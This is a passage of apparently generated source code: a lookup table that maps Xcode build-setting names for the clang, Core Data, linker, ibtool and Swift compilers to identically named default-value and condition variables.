"com_apple_compilers_llvm_clang_1_0__GCC_SYMBOLS_PRIVATE_EXTERN__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_SYMBOLS_PRIVATE_EXTERN__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_THREADSAFE_STATICS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_THREADSAFE_STATICS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_TREAT_IMPLICIT_FUNCTION_DECLARATIONS_AS_ERRORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_IMPLICIT_FUNCTION_DECLARATIONS_AS_ERRORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_TREAT_INCOMPATIBLE_POINTER_TYPE_WARNINGS_AS_ERRORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_INCOMPATIBLE_POINTER_TYPE_WARNINGS_AS_ERRORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_TREAT_WARNINGS_AS_ERRORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_WARNINGS_AS_ERRORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_UNROLL_LOOPS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_UNROLL_LOOPS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_USE_GCC3_PFE_SUPPORT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_USE_GCC3_PFE_SUPPORT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_USE_STANDARD_INCLUDE_SEARCHING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_USE_STANDARD_INCLUDE_SEARCHING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_64_TO_32_BIT_CONVERSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_64_TO_32_BIT_CONVERSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_FIELD_INITIALIZERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_FIELD_INITIALIZERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_NEWLINE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_NEWLINE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_PROTOTYPES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_PROTOTYPES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_POINTER_SIGNEDNESS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_POINTER_SIGNEDNESS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_RETURN_TYPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_RETURN_TYPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_ALLOW_INCOMPLETE_PROTOCOL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ALLOW_INCOMPLETE_PROTOCOL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_CHECK_SWITCH_STATEMENTS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_CHECK_SWITCH_STATEMENTS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_FOUR_CHARACTER_CONSTANTS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_FOUR_CHARACTER_CONSTANTS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_HIDDEN_VIRTUAL_FUNCTIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_HIDDEN_VIRTUAL_FUNCTIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_INHIBIT_ALL_WARNINGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_INHIBIT_ALL_WARNINGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_INITIALIZER_NOT_FULLY_BRACKETED__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_INITIALIZER_NOT_FULLY_BRACKETED__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_MISSING_PARENTHESES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_MISSING_PARENTHESES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_MULTIPLE_DEFINITION_TYPES_FOR_SELECTOR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_MULTIPLE_DEFINITION_TYPES_FOR_SELECTOR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_NON_VIRTUAL_DESTRUCTOR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_NON_VIRTUAL_DESTRUCTOR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_PEDANTIC__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_PEDANTIC__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_SHADOW__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_SHADOW__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_SIGN_COMPARE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_SIGN_COMPARE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_STRICT_SELECTOR_MATCH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_STRICT_SELECTOR_MATCH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_TYPECHECK_CALLS_TO_PRINTF__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_TYPECHECK_CALLS_TO_PRINTF__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNDECLARED_SELECTOR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNDECLARED_SELECTOR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNINITIALIZED_AUTOS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNINITIALIZED_AUTOS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNKNOWN_PRAGMAS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNKNOWN_PRAGMAS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_FUNCTION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_FUNCTION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_LABEL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_LABEL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_PARAMETER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_PARAMETER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VALUE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VALUE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VARIABLE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VARIABLE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__HEADERMAP_FILE_FORMAT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__HEADERMAP_FILE_FORMAT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_LTO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_LTO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_0__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_0__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_1__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_1__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_2__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_2__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_3__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_3__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_fast__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_fast__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_s__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_s__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_z__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_z__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__USE_HEADERMAP__DefaultValue": _com_apple_compilers_llvm_clang_1_0__USE_HEADERMAP__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__USE_HEADER_SYMLINKS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__USE_HEADER_SYMLINKS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__WARNING_CFLAGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__WARNING_CFLAGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__arch__Condition": _com_apple_compilers_llvm_clang_1_0__arch__Condition,
"com_apple_compilers_llvm_clang_1_0__diagnostic_message_length__DefaultValue": _com_apple_compilers_llvm_clang_1_0__diagnostic_message_length__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__print_note_include_stack__DefaultValue": _com_apple_compilers_llvm_clang_1_0__print_note_include_stack__DefaultValue,
"com_apple_compilers_model_coredata__DEPLOYMENT_TARGET__DefaultValue": _com_apple_compilers_model_coredata__DEPLOYMENT_TARGET__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_MODULE__DefaultValue": _com_apple_compilers_model_coredata__MOMC_MODULE__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_NO_DELETE_RULE_WARNINGS__DefaultValue": _com_apple_compilers_model_coredata__MOMC_NO_DELETE_RULE_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_NO_INVERSE_RELATIONSHIP_WARNINGS__DefaultValue": _com_apple_compilers_model_coredata__MOMC_NO_INVERSE_RELATIONSHIP_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_NO_MAX_PROPERTY_COUNT_WARNINGS__DefaultValue": _com_apple_compilers_model_coredata__MOMC_NO_MAX_PROPERTY_COUNT_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_NO_WARNINGS__DefaultValue": _com_apple_compilers_model_coredata__MOMC_NO_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__DefaultValue": _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodel__DefaultValue": _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodel__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodeld__DefaultValue": _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodeld__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_SUPPRESS_INVERSE_TRANSIENT_ERROR__DefaultValue": _com_apple_compilers_model_coredata__MOMC_SUPPRESS_INVERSE_TRANSIENT_ERROR__DefaultValue,
"com_apple_compilers_model_coredata__build_file_compiler_flags__DefaultValue": _com_apple_compilers_model_coredata__build_file_compiler_flags__DefaultValue,
"com_apple_compilers_model_coredatamapping__DEPLOYMENT_TARGET__DefaultValue": _com_apple_compilers_model_coredatamapping__DEPLOYMENT_TARGET__DefaultValue,
"com_apple_compilers_model_coredatamapping__MAPC_MODULE__DefaultValue": _com_apple_compilers_model_coredatamapping__MAPC_MODULE__DefaultValue,
"com_apple_compilers_model_coredatamapping__MAPC_NO_WARNINGS__DefaultValue": _com_apple_compilers_model_coredatamapping__MAPC_NO_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredatamapping__build_file_compiler_flags__DefaultValue": _com_apple_compilers_model_coredatamapping__build_file_compiler_flags__DefaultValue,
"com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__Condition": _com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__Condition,
"com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__DefaultValue": _com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__DefaultValue,
"com_apple_pbx_linkers_ld__BUNDLE_LOADER__DefaultValue": _com_apple_pbx_linkers_ld__BUNDLE_LOADER__DefaultValue,
"com_apple_pbx_linkers_ld__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue": _com_apple_pbx_linkers_ld__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue,
"com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__Condition": _com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__Condition,
"com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__DefaultValue": _com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__DefaultValue,
"com_apple_pbx_linkers_ld__EXPORTED_SYMBOLS_FILE__Condition": _com_apple_pbx_linkers_ld__EXPORTED_SYMBOLS_FILE__Condition,
"com_apple_pbx_linkers_ld__GENERATE_PROFILING_CODE__Condition": _com_apple_pbx_linkers_ld__GENERATE_PROFILING_CODE__Condition,
"com_apple_pbx_linkers_ld__KEEP_PRIVATE_EXTERNS__DefaultValue": _com_apple_pbx_linkers_ld__KEEP_PRIVATE_EXTERNS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__Condition": _com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__Condition,
"com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__DefaultValue": _com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__Condition": _com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__Condition,
"com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__DefaultValue": _com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DEPENDENCY_INFO_FILE__DefaultValue": _com_apple_pbx_linkers_ld__LD_DEPENDENCY_INFO_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__Condition": _com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__Condition,
"com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__DefaultValue": _com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__Condition": _com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__Condition,
"com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__DefaultValue": _com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DYLIB_ALLOWABLE_CLIENTS__DefaultValue": _com_apple_pbx_linkers_ld__LD_DYLIB_ALLOWABLE_CLIENTS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__Condition": _com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__Condition,
"com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__DefaultValue": _com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__DefaultValue,
"com_apple_pbx_linkers_ld__LD_EXPORT_GLOBAL_SYMBOLS__DefaultValue": _com_apple_pbx_linkers_ld__LD_EXPORT_GLOBAL_SYMBOLS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__Condition": _com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__Condition,
"com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__DefaultValue": _com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__Condition": _com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__Condition,
"com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__DefaultValue": _com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__DefaultValue,
"com_apple_pbx_linkers_ld__LD_GENERATE_MAP_FILE__DefaultValue": _com_apple_pbx_linkers_ld__LD_GENERATE_MAP_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__Condition": _com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__Condition,
"com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__DefaultValue": _com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__Condition": _com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__Condition,
"com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__DefaultValue": _com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_MAP_FILE_PATH__DefaultValue": _com_apple_pbx_linkers_ld__LD_MAP_FILE_PATH__DefaultValue,
"com_apple_pbx_linkers_ld__LD_NO_PIE__DefaultValue": _com_apple_pbx_linkers_ld__LD_NO_PIE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_OBJC_ABI_VERSION__DefaultValue": _com_apple_pbx_linkers_ld__LD_OBJC_ABI_VERSION__DefaultValue,
"com_apple_pbx_linkers_ld__LD_QUOTE_LINKER_ARGUMENTS_FOR_COMPILER_DRIVER__DefaultValue": _com_apple_pbx_linkers_ld__LD_QUOTE_LINKER_ARGUMENTS_FOR_COMPILER_DRIVER__DefaultValue,
"com_apple_pbx_linkers_ld__LD_RUNPATH_SEARCH_PATHS__DefaultValue": _com_apple_pbx_linkers_ld__LD_RUNPATH_SEARCH_PATHS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__Condition": _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__Condition,
"com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__DefaultValue": _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_VARIANTS__Condition": _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_VARIANTS__Condition,
"com_apple_pbx_linkers_ld__LD_THREAD_SANITIZER__DefaultValue": _com_apple_pbx_linkers_ld__LD_THREAD_SANITIZER__DefaultValue,
"com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__Condition": _com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__Condition,
"com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__DefaultValue": _com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__DefaultValue,
"com_apple_pbx_linkers_ld__LINKER_DISPLAYS_MANGLED_NAMES__DefaultValue": _com_apple_pbx_linkers_ld__LINKER_DISPLAYS_MANGLED_NAMES__DefaultValue,
"com_apple_pbx_linkers_ld__LINK_WITH_STANDARD_LIBRARIES__DefaultValue": _com_apple_pbx_linkers_ld__LINK_WITH_STANDARD_LIBRARIES__DefaultValue,
"com_apple_pbx_linkers_ld__ORDER_FILE__DefaultValue": _com_apple_pbx_linkers_ld__ORDER_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__Condition": _com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__Condition,
"com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__DefaultValue": _com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__DefaultValue,
"com_apple_pbx_linkers_ld__PRESERVE_DEAD_CODE_INITS_AND_TERMS__DefaultValue": _com_apple_pbx_linkers_ld__PRESERVE_DEAD_CODE_INITS_AND_TERMS__DefaultValue,
"com_apple_pbx_linkers_ld__UNEXPORTED_SYMBOLS_FILE__Condition": _com_apple_pbx_linkers_ld__UNEXPORTED_SYMBOLS_FILE__Condition,
"com_apple_pbx_linkers_ld____INPUT_FILE_LIST_PATH____DefaultValue": _com_apple_pbx_linkers_ld____INPUT_FILE_LIST_PATH____DefaultValue,
"com_apple_pbx_linkers_ld__arch__Condition": _com_apple_pbx_linkers_ld__arch__Condition,
"com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_AUTO_ACTIVATE_CUSTOM_FONTS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_AUTO_ACTIVATE_CUSTOM_FONTS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_USE_NIBARCHIVES_FOR_MACOS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_USE_NIBARCHIVES_FOR_MACOS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_ERRORS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_ERRORS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_FLATTEN_NIBS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_FLATTEN_NIBS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_MODULE__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_MODULE__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_NOTICES__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_NOTICES__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_OTHER_FLAGS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_OTHER_FLAGS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_PLUGINS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_PLUGINS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_PLUGIN_SEARCH_PATHS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_PLUGIN_SEARCH_PATHS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_REGIONS_AND_STRINGS_FILES__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_REGIONS_AND_STRINGS_FILES__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_WARNINGS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_WARNINGS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__XIB_COMPILER_INFOPLIST_CONTENT_FILE__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__XIB_COMPILER_INFOPLIST_CONTENT_FILE__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__build_file_compiler_flags__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__build_file_compiler_flags__DefaultValue,
"com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue": _com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING__DefaultValue": _com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_CROSS_MODULE_OPTIMIZATION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_CROSS_MODULE_OPTIMIZATION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_DEPLOYMENT_TARGET__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_DEPLOYMENT_TARGET__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_DISABLE_SAFETY_CHECKS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_DISABLE_SAFETY_CHECKS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_EMIT_MODULE_INTERFACE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_EMIT_MODULE_INTERFACE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_APP_EXTENSION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_APP_EXTENSION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_INCREMENTAL_COMPILATION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_INCREMENTAL_COMPILATION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_LIBRARY_EVOLUTION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_LIBRARY_EVOLUTION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_TESTABILITY__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_TESTABILITY__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENFORCE_EXCLUSIVE_ACCESS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENFORCE_EXCLUSIVE_ACCESS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_EXEC__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_EXEC__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_PATH__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_PATH__DefaultValue,
